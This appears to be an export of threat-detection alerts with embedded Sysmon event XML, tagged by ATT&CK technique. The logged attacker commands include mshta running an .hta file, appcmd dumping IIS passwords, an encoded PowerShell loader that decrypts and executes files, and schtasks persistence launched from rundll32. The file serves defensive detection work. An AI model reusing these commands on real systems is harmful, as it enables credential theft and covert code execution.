<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.473868Z"">
</TimeCreated>
<EventRecordID>5961</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.433</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00100FC7FF00</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-10T00:09:43.372595Z"">
</TimeCreated>
<EventRecordID>112972</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2728"" ThreadID=""3432"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-10 00:09:43.370</Data>
<Data Name=""ProcessGuid"">747F3D96-4647-5EB7-0000-0010B3454B01</Data>
<Data Name=""ProcessId"">7672</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
<Data Name=""ParentProcessId"">372</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.403767Z"">
</TimeCreated>
<EventRecordID>5958</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.353</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00104FC3FF00</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T10:16:50.455910Z"">
</TimeCreated>
<EventRecordID>5951</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 10:16:50.403</Data>
<Data Name=""ProcessGuid"">747F3D96-B092-5D46-0000-001089041204</Data>
<Data Name=""ProcessId"">7792</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
<Data Name=""ParentProcessId"">820</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.399534Z"">
</TimeCreated>
<EventRecordID>424076</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.394</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ParentProcessId"">3396</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-26T22:26:15.141764Z"">
</TimeCreated>
<EventRecordID>339223</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3332"" ThreadID=""3580"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-26 22:13:19.375</Data>
<Data Name=""ProcessGuid"">747F3D96-FF9D-5F1D-0000-00100AC62400</Data>
<Data Name=""ProcessId"">7400</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">127.0.0.1</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">49796</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">127.0.0.1</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
<Data Name=""DestinationPort"">445</Data>
<Data Name=""DestinationPortName"">microsoft-ds</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
